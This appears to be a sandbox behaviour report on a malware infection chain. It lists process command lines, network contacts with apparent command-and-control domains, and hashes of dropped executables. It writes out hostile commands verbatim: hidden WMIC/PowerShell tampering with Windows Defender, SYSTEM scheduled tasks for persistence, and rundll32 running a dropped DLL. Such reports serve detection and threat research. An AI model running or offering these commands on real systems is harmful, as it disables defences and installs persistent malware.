forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\XUTZbGF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\Qgobkqe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\qcQCdBm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 00:06:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll\",#1 /ZBEUdidXQBy 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll",#1 /ZBEUdidXQBy 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll",#1 /ZBEUdidXQBy 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5916 -ip 5916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 884 -ip 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 2372

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
RU 147.45.47.155:80 147.45.47.155 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
RU 185.215.113.67:40960 tcp
DE 185.172.128.33:8970 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 11.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 87.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 8.8.8.8:53 243.157.67.172.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 8.8.8.8:53 107.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
DE 23.88.106.134:80 23.88.106.134 tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 202.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 57.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 134.106.88.23.in-addr.arpa udp
US 8.8.8.8:53 163.220.67.172.in-addr.arpa udp
US 172.67.141.63:443 femininiespywageg.shop tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 104.21.85.81:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 172.67.131.36:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 63.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 81.85.21.104.in-addr.arpa udp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 36.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 64.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.4.235:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 gigapub.ma udp
US 8.8.8.8:53 f000.backblazeb2.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 104.153.233.177:443 f000.backblazeb2.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
US 8.8.8.8:53 177.233.153.104.in-addr.arpa udp
US 8.8.8.8:53 245.49.21.104.in-addr.arpa udp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 iili.io udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 104.21.235.69:443 iili.io tcp
US 8.8.8.8:53 s.360safe.com udp
N/A 224.0.0.251:5353 udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 69.235.21.104.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 sd.p.360safe.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
GB 99.86.249.197:80 sd.p.360safe.com tcp
US 8.8.8.8:53 197.249.86.99.in-addr.arpa udp
GB 85.192.56.26:80 85.192.56.26 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 26.56.192.85.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 iili.io udp
US 104.21.235.70:443 iili.io tcp
US 8.8.8.8:53 70.235.21.104.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 162.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.235.180.78:80 api5.check-data.xyz tcp
US 8.8.8.8:53 78.180.235.44.in-addr.arpa udp
RU 45.142.122.192:47398 tcp
US 8.8.8.8:53 192.122.142.45.in-addr.arpa udp

Files

memory/224-0-0x0000000000200000-0x00000000006C3000-memory.dmp

memory/224-1-0x00000000777A4000-0x00000000777A6000-memory.dmp

memory/224-2-0x0000000000201000-0x000000000022F000-memory.dmp

memory/224-3-0x0000000000200000-0x00000000006C3000-memory.dmp

memory/224-4-0x0000000000200000-0x00000000006C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 c61e453e041187460ae78a855542277a
SHA1 e45ee70d1dd37142ab6f9c298008f6e99a705c1b
SHA256 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
SHA512 b49d785316e1928b25a2e56bbc5343caedb529aeb563c21013483904a1f4d6a6bec61a744ecf124a3b82cfd7aa51d569b823ad9523b5fbacf15d58afb4d4baf7

memory/224-17-0x0000000000200000-0x00000000006C3000-memory.dmp

memory/1984-18-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1984-19-0x0000000000DF1000-0x0000000000E1F000-memory.dmp

memory/1984-20-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1984-21-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1984-24-0x0000000000DF0000-0x00000000012B3000-memory.dmp

C:\Users\Admin\1000004002\0869e0ea89.exe

MD5 96057c5c56acb0d52c76bbe1cd6a0f67
SHA1 df4ae6413a437f12f330cfdc3b845145a44bd4e8
SHA256 2f9245c5d009da38a03e867ed772d54ca845b4d2a8411258570d45b8a0f5ba61
SHA512 edce4639efaa8a205a8228cd9fcad7a18401b530614a7b74f56c2e70cb2aa91cfce874a48f38ae114cd1f71eea3cc1f4b05589272cdcaf1b5f98ae3ea2f8d4fc

memory/1392-40-0x0000000000240000-0x00000000006ED000-memory.dmp

memory/1984-41-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/4308-55-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1392-53-0x0000000000240000-0x00000000006ED000-memory.dmp

memory/1984-56-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1984-57-0x0000000000DF0000-0x00000000012B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe

MD5 f488c061fc9e0ee15445041996eba652
SHA1 b5a9c0f7418c65f24e98fc6e1b4312b2fc6fd425
SHA256 d0c03303c7d1c8405edab8e99eafc212a4405af456d943dd0b95e2fa7200cd9d
SHA512 de152a606ed87619d6fdd744507d0c2c7b0fd64e9c3e6a84573ab8ea8fac179931653bdf21f858b3f6e40b973e4ea4564ee2e5017102ada8089b70a949ce4cde

memory/1928-76-0x0000000000720000-0x0000000000D1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

MD5 208bd37e8ead92ed1b933239fb3c7079
SHA1 941191eed14fce000cfedbae9acfcb8761eb3492
SHA256 e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512 a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715

memory/224-92-0x00000000009F0000-0x00000000009F1000-memory.dmp

memory/224-94-0x00000000009F0000-0x00000000009F1000-memory.dmp

memory/2248-93-0x0000000000400000-0x0000000000592000-memory.dmp

memory/4308-95-0x0000000000270000-0x000000000071D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

memory/232-116-0x0000000000FA0000-0x0000000000FF2000-memory.dmp

memory/232-117-0x0000000005DB0000-0x0000000006354000-memory.dmp

memory/232-118-0x00000000058E0000-0x0000000005972000-memory.dmp

memory/232-119-0x00000000058D0000-0x00000000058DA000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

MD5 15a7cae61788e4718d3c33abb7be6436
SHA1 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256 bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA512 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

memory/4264-154-0x0000000000840000-0x0000000000892000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

MD5 816df4ac8c796b73a28159a0b17369b6
SHA1 db8bbb6f73fab9875de4aaa489c03665d2611558
SHA256 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA512 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

memory/232-156-0x0000000006520000-0x0000000006596000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp6184.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1181767204-2009306918-3718769404-1000\76b53b3ec448f7ccdda2063b15d2bfc3_d2547453-e731-4fdf-8f92-95f955a44aca

MD5 fb295ffd2d284256f6476e0ffb07451c
SHA1 560e71c75ae55493c4f79f6bf1f8d155212965a3
SHA256 0e0eb06d89508665ff368abeac34fb3b3f03a3380e0010d348da3a86863a6c76
SHA512 ff5348a95028406226253f5c85e49b21baaadbddfb7c3cff4970db6f2859f763a3cdaac4a18991e0b66fc94ab4055ea065ac80896dde7ac9c4b8434d2ef24c7e

memory/232-183-0x0000000006D00000-0x0000000006D1E000-memory.dmp

memory/232-186-0x0000000007440000-0x0000000007A58000-memory.dmp

memory/232-189-0x00000000070D0000-0x00000000071DA000-memory.dmp

memory/232-192-0x0000000007010000-0x0000000007022000-memory.dmp

memory/232-193-0x0000000007070000-0x00000000070AC000-memory.dmp

memory/232-196-0x00000000071E0000-0x000000000722C000-memory.dmp

C:\Users\Public\Desktop\Microsoft Edge.lnk

MD5 7275ec0a9703dd4d50333311e3c849f1
SHA1 4a307bc489f05fe6c195f5216b48478301209065
SHA256 682f3a49a5b307faa05e34eea661a3af4a535b4fd89325d7c5daf51316c5c262
SHA512 e172c600a29a8f6737654bd7c0fc562cd5c395a55adfc7beace9ab31feaf9d647f41906d09244b139aae1765a031f0bcf6a57c2ff2b847b5437a651231e56132

memory/3572-198-0x0000000000370000-0x00000000003DC000-memory.dmp

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 e47dece3a32a672b8452c28900afd2ff
SHA1 18842f1b4ebb4577718917c0571876609bf9957b
SHA256 5dc83497862b4e9ec12de9f57e59bdf890bf3899cd94a87b87fefa45f6227d27
SHA512 72b7e3ca45f11b827b9bd509843100173d5d9775b9a82c3b517db0a98418fba6ca9389b65187b2c22a983bc32492159b4498d41d5c7858069324877e7c1cb8f1

memory/5376-206-0x0000000000400000-0x0000000000455000-memory.dmp

memory/5256-205-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

memory/5376-204-0x0000000000400000-0x0000000000455000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/5568-223-0x0000000000400000-0x0000000000459000-memory.dmp

memory/5568-225-0x0000000000400000-0x0000000000459000-memory.dmp

memory/5524-224-0x00000000005F0000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

MD5 05b11e7b711b4aaa512029ffcb529b5a
SHA1 a8074cf8a13f21617632951e008cdfdace73bb83
SHA256 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512 dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

memory/5808-244-0x0000000000400000-0x000000000063B000-memory.dmp

memory/5808-242-0x0000000000400000-0x000000000063B000-memory.dmp

memory/5752-243-0x00000000030E0000-0x00000000030E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

MD5 a991da123f34074f2ee8ea0d798990f9
SHA1 3988195503348626e8f9185747a216c8e7839130
SHA256 fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA512 1f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49

memory/5976-263-0x000001CEC4250000-0x000001CEC428C000-memory.dmp

memory/4264-264-0x0000000006BC0000-0x0000000006C26000-memory.dmp

memory/1928-269-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/1984-267-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/4308-268-0x0000000000270000-0x000000000071D000-memory.dmp

memory/3572-274-0x000000001BF00000-0x000000001BF3C000-memory.dmp

memory/3572-273-0x00000000024F0000-0x0000000002502000-memory.dmp

memory/232-275-0x0000000007DB0000-0x0000000007E00000-memory.dmp

memory/3572-272-0x000000001DF30000-0x000000001E03A000-memory.dmp

memory/5976-277-0x000001CEC5F60000-0x000001CEC5FBC000-memory.dmp

memory/5976-276-0x000001CEC5F50000-0x000001CEC5F56000-memory.dmp

memory/5508-279-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\Pictures\CIlbwBfgHn2qJrOL4pYq8kk3.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

memory/5488-298-0x000001F555490000-0x000001F5554B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_otdg01va.uri.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3572-301-0x000000001E440000-0x000000001E4B6000-memory.dmp

memory/3572-302-0x000000001B260000-0x000000001B27E000-memory.dmp

C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe

MD5 ef65292d26c79999f9cd88fc202e257e
SHA1 bb1022e9d3d345f14db1f7e431d4d63259fa3ac2
SHA256 4bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222
SHA512 7df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a

memory/3572-318-0x000000001E9C0000-0x000000001EB82000-memory.dmp

memory/3572-329-0x000000001F0C0000-0x000000001F5E8000-memory.dmp

memory/1124-331-0x0000000000CC0000-0x0000000000D2A000-memory.dmp

C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe

MD5 cd4acedefa9ab5c7dccac667f91cef13
SHA1 bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256 dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA512 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

memory/1124-334-0x0000000004DE0000-0x0000000004E7C000-memory.dmp

memory/1984-337-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/4264-340-0x0000000007A50000-0x0000000007C12000-memory.dmp

memory/4264-341-0x00000000086C0000-0x0000000008BEC000-memory.dmp

memory/5524-339-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/6052-338-0x0000000000270000-0x000000000071D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp9AD9.tmp

MD5 5be7f6f434724dfcc01e8b2b0e753bbe
SHA1 ef1078290de6b5700ff6e804a79beba16c99ba3e
SHA256 4064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196
SHA512 3b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2

C:\Users\Admin\AppData\Local\Temp\tmp9B88.tmp

MD5 920cbfdea7790112706fd12deb065aa1
SHA1 ac4bf814ffd2747ce362e01f8944f7e4f71096a5
SHA256 71929ce286299de5d9e8d34e403364bf27b4abc5a94cabf2a975a6176c49610a
SHA512 38fa83fc55d269443f419c557afa8cd59f8b4ea0ceaf3e53ae764742a6a9ee038bd65f5fe3ed950e6ae7bb51454bbfb7bda45b0d62b241747712f5ef0eb06748

C:\Users\Admin\AppData\Local\Temp\{0DC98B18-A7A1-410f-8C09-15E472969220}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe

MD5 acadbe83c09a7a9b8213a662eda12e93
SHA1 26a6e55076bc0602ff9060ac529528f3fc631986
SHA256 42dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944
SHA512 a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f

memory/5524-400-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/6052-393-0x0000000000270000-0x000000000071D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe

MD5 0e0938f8a7266056305bfedda7e1e78a
SHA1 2b4aa419957936fa6c6a2afbadb6bc30c1c4895d
SHA256 b542adb1e853812925a1b5a1d1feac30125f05a9d7d0b1adce9ef4c6354c1066
